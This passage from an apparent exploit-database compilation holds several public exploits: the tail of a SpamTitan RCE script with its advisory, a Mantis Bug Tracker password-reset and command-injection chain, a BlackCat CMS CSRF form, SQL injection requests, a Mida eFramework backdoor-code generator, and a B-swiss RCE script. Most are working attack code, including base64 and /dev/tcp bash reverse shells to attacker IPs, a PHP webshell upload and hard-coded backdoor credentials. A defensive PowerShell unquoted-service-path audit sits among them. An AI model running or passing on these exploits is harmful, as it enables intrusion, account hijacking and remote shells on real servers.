        exit(1)
    else:
        if (not target.startswith("http://") and not target.startswith("https://")):
            target = "http://%s" % target
    if (method < 1 or method > 4):
        fail("Error. Specify a method from 1 to 4:\n (1) CVE-2020-11699 [RCE]\n (2) CVE-2020-XXXX [RCE]\n (3) CVE-2020-XXXX2 [RCE]\n (4) CVE-2020-11700 [File Read]")
        exit(1)

    # Before doing anything, login
    cookies = authenticate(target,user,password)
    if (cookies is not None):
        success("User logged in successfully.")
        if (method == 1):
            info("Exploiting CVE-2020-11699 to get a reverse shell on %s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11699, args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 2):
            info("Exploiting CVE-2020-11803 to get a reverse shell on %s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11803, args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 3):
            info("Exploiting CVE-2020-11804 to get a reverse shell on %s:%s" % (ip,port),quiet)
            rev_thread = threading.Thread(target=CVE_2020_11804, args=(cookies,target,shellurl))
            rev_thread.start()
            # Open the reverse shell listener in this main thread
            info("Spawning a reverse shell listener. Wait for it...")
            shellServer(options.ip,int(options.port),options.quiet)
        elif (method == 4):
            info("Reading file '%s' by abusing CVE-2020-11700." % rfile, quiet)
            CVE_2020_11700(cookies,target,rfile)
    else:
        fail("Error authenticating. Are you providing valid credentials?")
        exit(2)
    exit(0)

main()

---------------------------------------------

IV. Impact
~~~~~~~~~~

Loss of confidentiality, integrity and availability of several files in the target server, as well as loss of availability of several services running in the SpamTitan. Confidentiality of critical system files, such as /etc/passwd or /etc/pwd.db would be highly impacted.

V. Disclosure
~~~~~~~~~~~~~

Reported By: Felipe Molina de la Torre
Vendor Informed: 2020-04-17
Patch Release Date: 2019-05-26
Advisory Release Date: 2019-09-18

VI. References
~~~~~~~~~~~~~~

* https://sensepost.com/blog/2020/clash-of-the-spamtitan/
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11699
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11700
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11803
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11804

---------------------------------[SPUK-2020-09/SpamTitan 7.07 Multiple Authenticated Remote Code Execution]---
  10. # Exploit Title: Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)
# Date: 2020-09-17
# Vulnerability Discovery: hyp3rlinx, permanull
# Exploit Author: Nikolas Geiselman
# Vendor Homepage: https://mantisbt.org/
# Software Link: https://mantisbt.org/download.php
# Version: 1.3.0/2.3.0
# Tested on: Ubuntu 16.04/19.10/20.04
# CVE : CVE-2017-7615, CVE-2019-15715
# References:
# https://mantisbt.org/bugs/view.php?id=26091
# https://www.exploit-db.com/exploits/41890

'''
This exploit chains together two CVEs to achieve unauthenticated remote code execution.
The first portion of this exploit resets the Administrator password (CVE-2017-7615) discovered by John Page a.k.a hyp3rlinx,
this portion was modified from the original https://www.exploit-db.com/exploits/41890.
The second portion of this exploit takes advantage of a command injection vulnerability (CVE-2019-15715) discovered by 'permanull' (see references).

Usage:
Set netcat listener on port 4444
Send exploit with "python exploit.py"

Example output:
kali@kali:~/Desktop$ python exploit.py
Successfully hijacked account!
Successfully logged in!
Triggering reverse shell
Cleaning up
Deleting the dot_tool config.
Deleting the relationship_graph_enable config.
Successfully cleaned up

kali@kali:~/Desktop$ nc -nvlp 4444
listening on [any] 4444 ...
connect to [192.168.116.135] from (UNKNOWN) [192.168.116.151] 43978
bash: cannot set terminal process group (835): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/mantisbt-2.3.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
'''

import requests
from urllib import quote_plus
from base64 import b64encode
from re import split

class exploit():
    def __init__(self):
        self.s = requests.Session()
        self.headers = dict() # Initialize the headers dictionary
        self.RHOST = "192.168.116.151" # Victim IP
        self.RPORT = "80" # Victim port
        self.LHOST = "192.168.116.135" # Attacker IP
        self.LPORT = "4444" # Attacker Port
        self.verify_user_id = "1" # User id for the target account
        self.realname = "administrator" # Username to hijack
        self.passwd = "password" # New password after account hijack
        self.mantisLoc = "/mantisbt-2.3.0" # Location of mantis in URL
        self.ReverseShell = "echo " + b64encode("bash -i >& /dev/tcp/" + self.LHOST + "/" + self.LPORT + " 0>&1") + " | base64 -d | /bin/bash" # Reverse shell payload

    def reset_login(self):
        # Request # 1: Grab the account update token
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/verify.php?id=' + self.verify_user_id + '&confirm_hash='
        r = self.s.get(url=url,headers=self.headers)
        if r.status_code == 404:
            print "ERROR: Unable to access password reset page"
            exit()
        account_update_token = r.text.split('name="account_update_token" value=')[1].split('"')[1]

        # Request # 2: Reset the account password
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/account_update.php'
        data = "account_update_token=" + account_update_token + "&password=" + self.passwd + "&verify_user_id=" + self.verify_user_id + "&realname=" + self.realname + "&password_confirm=" + self.passwd
        self.headers.update({'Content-Type':'application/x-www-form-urlencoded'})
        r = self.s.post(url=url, headers=self.headers, data=data)
        if r.status_code == 200:
            print "Successfully hijacked account!"

    def login(self):
        data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
        r = self.s.post(url=url,headers=self.headers,data=data)
        if "login_page.php" not in r.url:
            print "Successfully logged in!"

    def CreateConfigOption(self, option, value):
        # Get adm_config_set_token
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_report.php'
        r = self.s.get(url=url, headers=self.headers)
        adm_config_set_token = r.text.split('name="adm_config_set_token" value=')[1].split('"')[1]

        # Create config
        data = "adm_config_set_token=" + adm_config_set_token + "&user_id=0&original_user_id=0&project_id=0&original_project_id=0&config_option=" + option + "&original_config_option=&type=0&value=" + quote_plus(value) + "&action=create&config_set=Create+Configuration+Option"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/adm_config_set.php'
        r = self.s.post(url=url, headers=self.headers, data=data)

    def TriggerExploit(self):
        print "Triggering reverse shell"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/workflow_graph_img.php'
        try:
            r = self.s.get(url=url,headers=self.headers, timeout=3)
        except:
            pass

    def Cleanup(self):
        # Delete the config settings that were created to send the reverse shell
        print "Cleaning up"
        cleaned_up = False
        cleanup = requests.Session()
        CleanupHeaders = dict()
        CleanupHeaders.update({'Content-Type':'application/x-www-form-urlencoded'})
        data = "return=index.php&username=" + self.realname + "&password=" + self.passwd + "&secure_session=on"
        url = 'http://' + self.RHOST + ":" + self.RPORT + self.mantisLoc + '/login.php'
        r = cleanup.post(url=url,headers=CleanupHeaders,data=data)

        ConfigsToCleanup = ['dot_tool','relationship_graph_enable']
        for config in ConfigsToCleanup:
            # Get adm_config_delete_token
            url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php"
            r = cleanup.get(url=url, headers=self.headers)
            test = split('<!-- Repeated Info Rows -->',r.text)
            # First element of the response list is garbage, delete it
            del test[0]
            cleanup_dict = dict()
            for i in range(len(test)):
                if config in test[i]:
                    cleanup_dict.update({'config_option':config})
                    cleanup_dict.update({'adm_config_delete_token':test[i].split('name="adm_config_delete_token" value=')[1].split('"')[1]})
                    cleanup_dict.update({'user_id':test[i].split('name="user_id" value=')[1].split('"')[1]})
                    cleanup_dict.update({'project_id':test[i].split('name="project_id" value=')[1].split('"')[1]})

            # Delete the config
            print "Deleting the " + config + " config."
            url = "http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_delete.php"
            data = "adm_config_delete_token=" + cleanup_dict['adm_config_delete_token'] + "&user_id=" + cleanup_dict['user_id'] + "&project_id=" + cleanup_dict['project_id'] + "&config_option=" + cleanup_dict['config_option'] + "&_confirmed=1"
            r = cleanup.post(url=url,headers=CleanupHeaders,data=data)

            #Confirm if actually cleaned up
            r = cleanup.get(url="http://" + self.RHOST + ":" + self.RPORT + self.mantisLoc + "/adm_config_report.php", headers=CleanupHeaders, verify=False)
            if config in r.text:
                cleaned_up = False
            else:
                cleaned_up = True

        if cleaned_up == True:
            print "Successfully cleaned up"
        else:
            print "Unable to clean up configs"

exploit = exploit()
exploit.reset_login()
exploit.login()
exploit.CreateConfigOption(option="relationship_graph_enable",value="1")
exploit.CreateConfigOption(option="dot_tool",value= exploit.ReverseShell + ';')
exploit.TriggerExploit()
exploit.Cleanup()
  11. # Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453

BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution.

PoC (Remove the csrf_token value) :

<input type="hidden" name="&#95;&#95;csrf&#95;magic" value=""/>

-------------------------------------------------------------------------------------------------------------------------------------------------

<html>
  <body>
  <script>history.pushState(",",'/')</script>
    <form action="http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php" method="POST">
      <input type="hidden" name="&#95;&#95;csrf&#95;magic" value=""/>
      <input type="hidden" name="username&#95;fieldname" value="username&#95;274807982ed4"/>
      <input type="hidden" name="password&#95;fieldname" value="password&#95;75868428f837"/>
      <input type="hidden" name="&#95;cat&#95;ajax" value="1"/>
      <input type="hidden" name="username&#95;274807982ed4" value="accountname"/>
      <input type="hidden" name="password&#95;75868428f837" value="yourpassword"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
  12. # Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip
# Tested on: Apache2

GET /shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org

PoC: /URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20-
  13. # Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path
# Discovery by: Burhanettin Özgenç
# Discovery Date: 2020-09-15
# Vendor Homepage: https://www.forensit.com/downloads.html
# Tested Version: 2.2.0.4
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64

# Step to discover Unquoted Service Path:

C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """
ForensiT AppX Management Service  ForensiTAppxService  C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe  Auto

# Service info:

C:\>sc qc ForensiTAppxService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ForensiTAppxService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : ForensiT AppX Management Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
# A successful attempt would require the local user to be able to insert their code in the system
# root path undetected by the OS or other security applications where it could potentially be executed
# during application startup or reboot. If successful, the local user's code would execute with
# the elevated privileges of the application.
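The wmic/findstr one-liner above only lists unquoted auto-start paths. The following PowerShell audit script is an added example for defenders (not part of the original advisory or the vendor's code): it enumerates the same services, derives the shorter paths Windows would probe before the real binary, reports which of their parent directories grant create or write rights to Everyone, Authenticated Users or BUILTIN\Users, and prints the registry change that quotes the ImagePath. It assumes an elevated prompt so every service configuration and directory ACL is readable.

```powershell
# Audit-only: nothing is modified, remediation is printed for review.
# Low-privileged principals whose write access to a probed directory is a finding.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-32-545'   # BUILTIN\Users
)
# Individual rights that let a caller plant or replace a file. Deliberately not Write/Modify/FullControl,
# because those composites share bits with read rights and would match every Allow ACE.
$plantMask = [System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, ChangePermissions, TakeOwnership'

function Split-ServicePath([string]$PathName) {
    # Returns the executable part (up to and including .exe) and whatever follows it (arguments).
    $exe = ($PathName -split '(?i)\.exe')[0] + '.exe'
    [pscustomobject]@{ Exe = $exe; Args = $PathName.Substring([Math]::Min($exe.Length, $PathName.Length)) }
}

function Get-UnquotedServicePath {
    # Same filter as the advisory's wmic query: auto-start, outside C:\Windows, unquoted, space before .exe.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.StartMode -eq 'Auto' -and
            $_.PathName -notmatch '^\s*"' -and
            $_.PathName -notlike 'C:\Windows\*' -and
            (Split-ServicePath $_.PathName).Exe -match '\s'
        }
}

function Get-ProbedPaths([string]$PathName) {
    # CreateProcess tries every prefix that ends at a space, with .exe appended, before the full path:
    # C:\Program Files (x86)\ForensiT\AppX Management Service\x.exe ->
    #   C:\Program.exe, C:\Program Files.exe, C:\Program Files (x86)\ForensiT\AppX.exe, ...
    $parts = (Split-ServicePath $PathName).Exe -split ' '
    for ($i = 1; $i -lt $parts.Count; $i++) {
        ($parts[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-LowPrivWritable([string]$Directory) {
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $acl = Get-Acl -LiteralPath $Directory
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $sid = $null
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value } catch { }
        if ($sid -in $lowPrivSids -and (([int]$ace.FileSystemRights) -band ([int]$plantMask))) { return $true }
    }
    return $false
}

foreach ($svc in Get-UnquotedServicePath) {
    Write-Host "[!] $($svc.Name) ($($svc.StartName)) : $($svc.PathName)"
    $exposed = $false
    foreach ($candidate in Get-ProbedPaths $svc.PathName) {
        $dir = Split-Path -Parent $candidate
        if (Test-LowPrivWritable $dir) {
            $exposed = $true
            Write-Host "    [-] $dir is writable by a low-privileged group; a planted $candidate would run as $($svc.StartName)"
        }
    }
    if (-not $exposed) { Write-Host "    [+] no probed directory is writable by low-privileged groups (still worth quoting)" }
    # Remediation: quote the executable so the service manager stops probing the shorter paths.
    $split  = Split-ServicePath $svc.PathName
    $quoted = '"' + $split.Exe + '"' + $split.Args
    Write-Host "    fix: Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)' -Name ImagePath -Value '$quoted'"
}
```

The ACL check is the part the wmic query cannot do: an unquoted path is only exploitable when one of the probed directories is writable, so that is the finding to prioritise, while quoting the path removes the issue regardless.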
  14. # Exploit Title: Mida eFramework 2.9.0 - Back Door Access
# Google Dork: Server: Mida eFramework
# Date: 2020-08-27
# Exploit Author: elbae
# Vendor Homepage: https://www.midasolutions.com/
# Software Link: http://ova-efw.midasolutions.com/
# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
# Version: <= 2.9.0
# CVE : CVE-2020-15921

#! /usr/bin/python3
# -*- coding: utf-8 -*-

from datetime import date

def print_disclaimer():
    print("""
---------------------
Disclaimer:
1) For testing purpose only.
2) Do not attack production environments.
3) Intended for educational purposes only and cannot be used for law violation or personal gain.
4) The author is not responsible for any possible harm caused by this material.
---------------------""")

def print_info():
    print("""
[*] Mida Solutions eFramework PDC Administrative Back-Door access (CVE-2020-15921)
[*] Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html
[*] This script can be used to retrieve the code which gives you the possibility to change the password.
[*] How it works:
    1) run the script
    2) copy the output to the URL you want to access (i.e. http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE)
    3) change the password
    4) access as admin with the password
""")

def main():
    print_info()
    print_disclaimer()

    abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
           'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']
    baseString = 'midasoluti' # default value from source code
    today = date.today()
    dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year)
    retString = ""
    for i in range(0,len(baseString)):
        n = int(abc.index(baseString[i]))
        m = int(dateString[i])
        s = n+m
        if (s >= len(abc)):
            s = m
        retString += abc[s]

    print("[+] Generated code: {}".format(retString))
    print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0} ".format(retString))
    print("[?] Example URL: https://target/PDC/extreq.php?code={0} ".format(retString))

if __name__ == '__main__':
    main()
  15. # Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection
# Date: 2020-09-20
# Exploit Author: Augkim
# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip
# Tested on: Apache2

POST /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/sere/
Connection: close
Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Origin: foo.example.org

PoC: /URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8--
  16. # Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution
# Date: 2020-08-27
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.b-swiss.com
# Version: <= 3.6.5
# CVE : N/A

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution
#
#
# Vendor: B-Swiss SARL | b-tween Sarl
# Product web page: https://www.b-swiss.com
# Affected version: 3.6.5
#                   3.6.2
#                   3.6.1
#                   3.6.0
#                   3.5.80
#                   3.5.40
#                   3.5.20
#                   3.5.00
#                   3.2.00
#                   3.1.00
#
# Summary: Intelligent digital signage made easy. To go beyond the
# possibilities offered, b-swiss allows you to create the communication
# solution for your specific needs and your graphic charter. You benefit
# from our experience and know-how in the realization of your digital
# signage project.
#
# Desc: The application suffers from an "authenticated" arbitrary
# PHP code execution. The vulnerability is caused due to the improper
# verification of uploaded files in 'index.php' script thru the 'rec_poza'
# POST parameter. This can be exploited to execute arbitrary PHP code
# by uploading a malicious PHP script file that will be stored in
# '/usr/users' directory. Due to an undocumented and hidden "maintenance"
# account 'admin_m' which has the highest privileges in the application,
# an attacker can use these hard-coded credentials to authenticate and
# use the vulnerable image upload functionality to execute code on the
# server.
#
# ========================================================================================
# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777
# [*] Checking target...
# [*] Good to go!
# [*] Checking for previous attempts...
# [*] All good.
# [*] Getting backdoor session...
# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2
# [*] Starting callback listener child thread
# [*] Starting handler on port 7777
# [*] Adding GUI credentials: test:123456
# [*] Executing and deleting stager file
# [*] Connection from 192.168.10.11:40080
# [*] You got shell!
# id ; uname -or
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
# 4.15.0-20-generic GNU/Linux
# exit
# *** Connection closed by remote host ***
# [?] Want me to remove the GUI credentials? y
# [*] Removing...
# [*] t00t!
# lqwrm@metalgear:~/prive$
# ========================================================================================
#
# Tested on: Linux 5.3.0-46-generic x86_64
#            Linux 4.15.0-20-generic x86_64
#            Linux 4.9.78-xxxx-std-ipv6-64
#            Linux 4.7.0-040700-generic x86_64
#            Linux 4.2.0-27-generic x86_64
#            Linux 3.19.0-47-generic x86_64
#            Linux 2.6.32-5-amd64 x86_64
#            Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64
#            macOS 10.13.5
#            Microsoft Windows 7 Business Edition SP1 i586
#            Apache/2.4.29 (Ubuntu)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.4.7 (Ubuntu)
#            Apache/2.2.22 (Win64)
#            Apache/2.4.18 (Ubuntu)
#            Apache/2.2.16 (Debian)
#            PHP/7.2.24-0ubuntu0.18.04.6
#            PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1
#            PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1
#            PHP/5.6.31
#            PHP/5.6.30-10+deb.sury.org~xenial+2
#            PHP/5.5.9-1ubuntu4.17
#            PHP/5.5.9-1ubuntu4.14
#            PHP/5.3.10
#            PHP/5.3.13
#            PHP/5.3.3-7+squeeze16
#            PHP/5.3.3-7+squeeze17
#            MySQL/5.5.49
#            MySQL/5.5.47
#            MySQL/5.5.40
#            MySQL/5.5.30
#            MySQL/5.1.66
#            MySQL/5.1.49
#            MySQL/5.0.77
#            MySQL/5.0.12-dev
#            MySQL/5.0.11-dev
#            MySQL/5.0.8-dev
#            phpMyAdmin/3.5.7
#            phpMyAdmin/3.4.10.1deb1
#            phpMyAdmin/3.4.7
#            phpMyAdmin/3.3.7deb7
#            WampServer 3.2.0
#            Acore Framework 2.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             Macedonian Information Security Research and Development Laboratory
#                             Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5590
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php
#
#
# 13.06.2020
#

from http.cookiejar import DefaultCookiePolicy#                                           #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr
from http.cookiejar import CookieJar#                      oOo                            #raJeikooC tropmi rajeikooc.ptth mofr
from six.moves import input#               #-----------------+-----------------#          #tupni trompi sevom.xis morf
from time import sleep#                    |       01        |        04       |          #peels trompi emit morf
import urllib.request#                     |        |        |        |        |          #tseuqer.billru tropmi
import urllib.parse#                       |        |        |        |        |          #esrap.billru tropmi
import telnetlib#                          |        |        |                 |          #biltenlet tropmi
import threading#                          |        |        |        |        |          #gnidaerht tropmi
import requests#                           |        |        |        |        |          #stseuqer tropmi
import socket#                             |        |        |        o        |          #tekcos tropmi
import sys,re#                             |        |        |                 |          #er,sys tropmi
##############                             #-----------------+-----------------#          ##############
###############                                            oOo                           ###############
################                                            |                           ################
####################                                        Y                        ####################
############################                                _                ############################
###############################################################################################

class Sign:
    def __init__(self):
        self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d"
        self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73"
        self.password = b"\x44\x50\x36\x25\x57\x33\x64"
        self.agent = "SignageBot/1.02"
        self.fileid = "251"
        self.payload = None
        self.answer = False
        self.params = None
        self.rhost = None
        self.lhost = None
        self.lport = None
        self.send = None

    def env(self):
        if len(sys.argv) != 4:
            self.usage()
        else:
            self.rhost = sys.argv[1]
            self.lhost = sys.argv[2]
            self.lport = int(sys.argv[3])
        if not "http" in self.rhost:
            self.rhost = "http://{}".format(self.rhost)

    def usage(self):
        self.roger()
        print("Usage: python3 {} <RHOST[:RPORT]> <LHOST> <LPORT>".format(sys.argv[0]))
        print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0]))
        exit(0)

    def roger(self):
        waddup = """
          ____________________
         /                    \\
        !     B-swiss 3        !
        !       RCE            !
         \____________________/
                 !  !
                 !  !
                 L_ !
                / _)!
               / /__L
         _____/ (____)
                (____)
         _____  (____)
              \_(____)
                 !  !
                 !  !
                  \__/
        """
        print(waddup)

    def test(self):
        print("[*] Checking target...")
        try:
            r = requests.get(self.rhost)
            response = r.text
            if not "B-swiss" in response:
                print("[!] Not a b-swiss system")
                exit(0)
            if "B-swiss" in response:
                print("[*] Good to go!")
                next
            else:
                exit(-251)
        except Exception as e:
            print("[!] Ney ney: {msg}".format(msg=e))
            exit(-1)

    def login(self):
        token = ""
        cj = CookieJar()
        self.params = {"locator" : "visitor.ProcessLogin",
                       "username" : self.username,
                       "password" : self.password,
                       "x" : "0",
                       "y" : "0"}
        damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
        damato.addheaders.pop()
        damato.addheaders.append(("User-Agent", self.agent))
        try:
            print("[*] Getting backdoor session...")
            damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8'))
            for cookie in cj:
                token = cookie.value
                print("[*] Got master backdoor cookie: "+token)
        except urllib.request.URLError as e:
            print("[!] Connection error: {}".format(e.reason))
        return token

    def upload(self):
        j = "\r\n"
        self.cookies = {"PNU_RAD_LIB" : self.rtoken}
        self.headers = {"Cache-Control" : "max-age=0",
                        "Content-Type" : "multipart/form-data; boundary=----j",
                        "User-Agent" : self.agent,
                        "Accept-Encoding" : "gzip, deflate",
                        "Accept-Language" : "en-US,en;q=0.9",
                        "Connection" : "close"}
        self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");"
        print("[*] Adding GUI credentials: test:123456")
        # rec_adminlevel values:
        # ----------------------
        # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege)
        #      7 - "B-swiss admin" <---------------------------------------------------------------------------------------+
        #      8 - Other                                                                                                    |
        #                                                                                                                   |
        self.send = "------j{}Content-Disposition: form-data; ".format(j)#                                                  |
        self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#             |
        self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                              |
        self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                              |
        self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)#           |
        self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                       |
        self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                           |
        self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                        |
        self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                             |
        self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)#                  |
        self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)#             |
        self.send += "name=\"rec_email\"{}[email protected]{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#    |
        self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#              |
        self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#            |
        self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)#           |
        self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+
        self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2)
        self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j)
        self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)
        self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j)
        requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send)
        print("[*] Executing and deleting stager file")
        r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php")
        sleep(1)
        self.answer = input("[?] Want me to remove the GUI credentials? ").strip()
        if self.answer[0] == "y" or self.answer[0] == "Y":
            print("[*] Removing...")
            requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies)
        if self.answer[0] == "n" or self.answer[0] == "N":
            print("[*] Cool!")
        print("[*] t00t!")
        exit(-1)

